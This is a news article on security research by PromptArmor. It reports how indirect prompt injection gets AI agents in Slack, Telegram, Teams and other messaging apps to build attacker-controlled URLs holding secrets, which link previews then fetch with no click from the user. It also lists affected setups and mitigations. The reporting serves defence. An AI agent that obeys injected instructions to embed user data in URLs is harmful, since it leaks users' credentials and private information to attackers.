AI agents spill secrets just by previewing malicious links
AI agents can shop for you, program for you, and, if you're feeling bold, chat for you in a messaging app. But beware: attackers can use malicious prompts in chat to trick an AI agent into generating a data-leaking URL, which link previews may fetch automatically.
Messaging apps commonly use link previews, which let the app query links dropped in a message to extract a title, description, and thumbnail to display in place of a plain URL. As discovered by AI security firm PromptArmor, link previews can turn URLs generated by an AI agent and controlled by an attacker into a zero-click data-exfiltration channel, allowing sensitive information to be leaked without any user interaction.
As PromptArmor notes in its report, indirect prompt injection via malicious links isn't unheard of, but typically requires the victim to click a link after an AI system has been tricked into appending sensitive user data to an attacker-controlled URL. When the same technique is used against an AI agent operating inside messaging platforms such as Slack or Telegram, where link previews are enabled by default or in certain configurations, the problem gets a whole lot worse.
"In agentic systems with link previews, data exfiltration can occur immediately upon the AI agent responding to the user, without the user needing to click the malicious link," PromptArmor explained.
Without a link preview, an AI agent or a human operator has to follow a link, triggering a network request after the AI system has been tricked into appending sensitive user data to an attacker-controlled URL. As mentioned, this type of prompt injection attack can extract various types of sensitive data, such as API keys and the like, by tricking an AI agent into appending the info onto the URL.
Because a link preview pulls metadata from the target website, that whole attack chain can be accomplished with zero interaction: once an AI agent has been tricked into generating a URL containing sensitive data, the preview system automatically fetches it. The only difference is where the data-exposing URL is found - in this case in the attacker's request log.
It won't shock you to learn that vibe-coded agentic AI disaster platform OpenClaw is vulnerable to this attack when using default configurations in Telegram, which PromptArmor notes can be fixed by making a change in OpenClaw's config file as detailed in the article, but it seems from the data that PromptArmor provided that OpenClaw isn't the biggest offender.
The company created a website where users can test AI agents integrated into messaging apps to see whether they trigger insecure link previews. Based on reported results from those tests, Microsoft Teams accounts for the largest share of preview fetches, and in the logged cases, it is paired with Microsoft's own Copilot Studio. Other reported at-risk combinations include Discord with OpenClaw, Slack with Cursor Slackbot, Discord with BoltBot, Snapchat with SnapAI, and Telegram with OpenClaw.
Reported safer setups include the Claude app in Slack, OpenClaw running via WhatsApp, and OpenClaw deployed "in Docker via Signal in Docker," if you really want to complicate things.
While this is an issue with how AI agents handle the processing of link previews, PromptArmor notes that it's going to largely be up to messaging apps to fix the issue.
"It falls on communication apps to expose link preview preferences to developers, and agent developers to leverage the preferences provided," the security firm explained. "We'd like to see communication apps consider supporting custom link preview configurations on a chat/channel-specific basis to create LLM-safe channels."
Until that happens, consider this yet another warning against adding an AI agent into an environment where confidentiality is important. ®